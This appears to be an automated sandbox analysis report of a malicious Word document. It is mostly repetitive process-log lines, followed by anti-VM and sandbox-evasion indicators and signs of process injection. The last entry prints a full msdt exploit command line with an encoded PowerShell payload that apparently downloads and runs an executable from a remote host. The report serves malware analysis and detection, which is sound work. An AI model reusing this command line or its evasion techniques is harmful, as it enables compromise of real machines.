Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.552178062.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PROMZwFp385vXrN.exe PID: 5444, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PMoZbw.exe PID: 3300, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: PROMZwFp385vXrN.exe, 0000000F.00000002.552178062.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.552178062.0000000002E7F000.00000004.00000800.00020000.00000000.sdmp, PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe TID: 5456

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\msdt.exe

Window / User API: threadDelayed 779

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mnm1snwx\mnm1snwx.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\zf01cjt2\zf01cjt2.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yjsbg2wl\yjsbg2wl.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe	Memory allocated: 11D0000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\AppData\Roaming\PMoZbw\PMoZbw.exe	Memory allocated: 2EE0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE
Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: PROMZwFp385vXrN.exe, 0000000F.00000002.581985407.0000000003F3D000.00000004.00000800.00020000.00000000.sdmp, PROMZwFp385vXrN.exe, 0000000F.00000002.584636580.0000000004045000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: QEMU?
Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA II
Source: PMoZbw.exe, 00000013.00000002.625883552.0000000003060000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Code function: 17_2_06D36AC8 LdrInitializeThunk,

17_2_06D36AC8

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe

Memory written: C:\Users\user\AppData\Roaming\PROMZwFp385vXrN.exe base: 400000 value starts with: 4D5A

Jump to behavior

.NET source code references suspicious native API functions

Source: 15.0.PROMZwFp385vXrN.exe.7b0000.0.unpack, wSdw78jkfQ8V3Hyi0v/xcQxBNKQ91ktbrVpBN.cs	Reference to suspicious API methods: ('QENv8bZXKE', 'GetProcAddress@kernel32'), ('G9Rvbd0JQm', 'LoadLibrary@kernel32')
Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, A/C1.cs	Reference to suspicious API methods: ('A', 'VirtualAllocExNuma@kernel32.dll')
Source: 17.0.PROMZwFp385vXrN.exe.400000.0.unpack, A/e2.cs	Reference to suspicious API methods: ('A', 'MapVirtualKey@user32.dll')

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\msdt.exe c:\windows\system32\msdt.exe" ms-msdt:/id pcwdiagnostic /skip force /param "it_rebrowseforfile=#6aw it_launchmethod=contextmenu it_browseforfile=4n0$(iex($(iex('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'u1rpcc1wum9jrvntic1gt1jdzsattkftzsanbxnkdcc7jdggpsbbzgqtdflqzsattuvtqkvyzevgsu5pdglptianw0rsbeltcg9ydcgivxjmtw9ulmrsbcisienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigskcsc3ryaw5nifvxysxzdhjpbmcgcfksdwludcblyyxjbnrqdhigcnepoycglu5bbuugilfdiiatbmfnrvnwyunfigd1ic1qyxnzvghydtsgjdg6olvstervd25sb2fkvg9gawxlkdasimh0dhbzoi8vchpzcmjsb2cuy29tl3dwlwnvbnrlbnqvdxbsb2fkcy8ymdeyl1bst01ad0zwmzg1dlhyti5leguilcikrw5wokfquerbvefcufjptvp3rnazodv2whjolmv4zsismcwwktttdgfsvc1zbevlccgzkttjbnzpa0utsvrlbsaijgvudjpbufbeqvrbxfbst01ad0zwmzg1dlhyti5leguio3n0t3atufjpy2vtuyatzk9sy0uglw5hbwugj3nkawfnbmhvc3qn'+[char]0x22+'))'))))m3/../../../../../../../../../../../../../../../../.exe
